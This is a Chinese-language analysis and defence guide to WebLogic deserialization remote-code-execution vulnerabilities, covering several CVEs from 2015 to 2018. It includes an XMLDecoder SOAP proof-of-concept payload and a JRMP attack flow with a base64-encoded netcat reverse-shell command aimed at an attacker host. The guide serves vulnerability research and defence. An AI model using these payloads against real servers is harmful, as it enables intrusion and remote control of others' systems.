WebLogic反序列化漏洞分析与防御指南<\/h1>

1. WebLogic简介<\/h2>

WebLogic是美国Oracle公司出品的一个基于Java EE架构的中间件应用服务器，具有以下特点：<\/p>

功能全面：支持EJB、JSP、servlet、JMS等Java EE标准<\/li>
扩展性强：提供出色的群集技术，实现网页和EJB组件群集<\/li>

市场地位：全球使用量前列，中国地区资产数量达10562台（2018年数据）<\/li> <\/ul>

2. WebLogic高危漏洞分类<\/h2>

2.1 XML反序列化RCE漏洞<\/h3>

CVE-2017-3506<\/h4>

漏洞原理<\/strong>：<\/p>

漏洞位于wls组件的webservice处理soap请求过程中<\/li>
weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest<\/code>方法处理请求<\/li>
当localHeader1<\/code>和localHeader2<\/code>都不为null时，会将<work:WorkContext><\/code>数据传入readHeaderOld<\/code>方法<\/li>
最终通过XMLDecoder()<\/code>进行反序列化操作<\/li> <\/ul> 影响路径<\/strong>：<\/p> \/wls-wsat\/CoordinatorPortType \/wls-wsat\/RegistrationPortTypeRPC \/wls-wsat\/ParticipantPortType \/wls-wsat\/RegistrationRequesterPortType \/wls-wsat\/CoordinatorPortType11 \/wls-wsat\/RegistrationPortTypeRPC11 \/wls-wsat\/ParticipantPortType11 \/wls-wsat\/RegistrationRequesterPortType11 <\/code><\/pre> POC构造<\/strong>：<\/p> <work:WorkContext><\/span> <\/span><\/span> <java<\/span> version=<\/span>"1.8.0"<\/span> class=<\/span>"java.beans.XMLDecoder"<\/span>><\/span> <\/span><\/span> <object<\/span> class=<\/span>"java.lang.ProcessBuilder"<\/span>><\/span> <\/span><\/span> <array<\/span> class=<\/span>"java.lang.String"<\/span> length=<\/span>"3"<\/span>><\/span> <\/span><\/span> <void<\/span> index=<\/span>"0"<\/span>><string><\/span>\/bin\/bash<\/string><\/void><\/span> <\/span><\/span> <void<\/span> index=<\/span>"1"<\/span>><string><\/span>-c<\/string><\/void><\/span> <\/span><\/span> <void<\/span> index=<\/span>"2"<\/span>><string><\/span>恶意命令<\/string><\/void><\/span> <\/span><\/span> <\/array><\/span> <\/span><\/span> <void<\/span> method=<\/span>"start"<\/span>\/><\/span> <\/span><\/span> <\/object><\/span> <\/span><\/span> <\/java><\/span> <\/span><\/span><\/work:WorkContext><\/span> <\/span><\/span><\/code><\/pre>CVE-2017-10271<\/h4> 绕过原理<\/strong>：<\/p> CVE-2017-3506补丁仅限制了object<\/code>标签<\/li> 通过使用array<\/code>或void<\/code>等标签绕过限制<\/li> <\/ul> 补丁改进<\/strong>：<\/p> 增加了new<\/code>、method<\/code>、void<\/code>、array<\/code>等关键字到黑名单<\/li> <\/ul> 2.2 Java反序列化RCE漏洞<\/h3> CVE-2015-4852<\/h4> 漏洞原理<\/strong>：<\/p> 利用Apache Commons Collections的TransformedMap<\/code>类<\/li> 当TransformedMap<\/code>的key或value变化时，会触发Transformer<\/code>的transform()<\/code>方法<\/li> 通过ChainedTransformer<\/code>构造调用链，最终利用反射执行Runtime.getRuntime().exec<\/code><\/li> <\/ul> 利用工具<\/strong>：<\/p> ysoserial：生成Java反序列化payload<\/li> SerializationDumper：分析Java序列化结构<\/li> <\/ul> CVE-2016-0638<\/h4> 绕过原理<\/strong>：<\/p> 利用weblogic.jms.common.StreamMessageImpl<\/code>类<\/li> 其readExternal()<\/code>方法可构造恶意ObjectInputStream<\/code><\/li> 绕过ServerChannelInputStream<\/code>和MsgAbbrevInputStream<\/code>的限制<\/li> <\/ul> CVE-2016-3510<\/h4> 绕过原理<\/strong>：<\/p> 使用weblogic.corba.utils.MarshalledObject<\/code>类<\/li> 命令执行格式限制：必须使用bash -c {echo,BASE64}|{base64,-d}|{bash,-i}<\/code>形式<\/li> <\/ul> CVE-2017-3248<\/h4> 漏洞原理<\/strong>：<\/p> 利用JRMP(Java远程方法协议)<\/li> 序列化RemoteObjectInvocationHandler<\/code>，使用UnicastRef<\/code>建立TCP连接<\/li> 获取RMI registry后通过readObject()<\/code>解析执行恶意代码<\/li> <\/ul> CVE-2018-2628<\/h4> 漏洞原理<\/strong>：<\/p> 使用java.rmi.activation.Activator<\/code>替代java.rmi.registry.Registry<\/code><\/li> 绕过resolveProxyClass<\/code>的判断<\/li> <\/ul> 攻击流程示例<\/strong>：<\/p> 攻击机(192.168.16.1)开启nc监听：nc -nlvp 4040<\/code><\/li> JRMP监听机(192.168.16.3)执行： java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'bash -c {echo,bmMgLW52IDE5Mi4xNjguMTYuMSA0MDQw}|{base64,-d}|{bash,-i}' <\/code><\/pre> <\/li> 执行攻击脚本： python exploit.py 目标IP 7001 ysoserial.jar JRMP监听IP 1099 JRMPClient2 <\/code><\/pre> <\/li> <\/ol> CVE-2018-2893<\/h4> 漏洞原理<\/strong>：<\/p> 结合StreamMessageImpl<\/code>封装和JRMPClient<\/li> StreamMessageImpl<\/code>反序列化时不会被resolveProxyClass<\/code>检测<\/li> <\/ul> 3. 防御建议<\/h2> 及时更新补丁<\/strong>：Oracle发布的补丁虽然可能被绕过，但仍是最基础的防护措施<\/li> 网络隔离<\/strong>：限制WebLogic服务不必要的网络访问<\/li> 禁用危险功能<\/strong>：如非必要，禁用T3、IIOP等协议<\/li> 安全配置<\/strong>：删除或限制访问wls-wsat<\/code>组件<\/li> 启用WebLogic的安全管理器<\/li> <\/ul> <\/li> 监控与检测<\/strong>：部署WAF规则检测反序列化攻击<\/li> 监控异常网络连接和进程创建行为<\/li> <\/ul> <\/li> 代码审计<\/strong>：定期检查自定义代码中的反序列化操作<\/li> <\/ol> 4. 工具推荐<\/h2> ysoserial<\/strong>：生成Java反序列化payload用于测试<\/li> SerializationDumper<\/strong>：分析Java序列化结构<\/li> 在线工具<\/strong>：生成Base64编码的命令payload http:\/\/jackson.thuraisamy.me\/runtime-exec-payloads.html<\/li> <\/ul> <\/li> <\/ol> 5. 总结<\/h2> WebLogic反序列化漏洞的修复与绕过展示了安全攻防的持续博弈。防御方需要：<\/p> 深入理解漏洞原理而非简单依赖黑名单<\/li> 采取纵深防御策略<\/li> 保持对新型攻击手法的关注和研究<\/li> <\/ul> 作为安全研究人员，应当：<\/p> 深度剖析漏洞原理<\/li> 探索可能的其他利用方式<\/li> 在漏洞被利用前发现并修复<\/li> 推动更安全的编码和配置实践<\/li> <\/ol>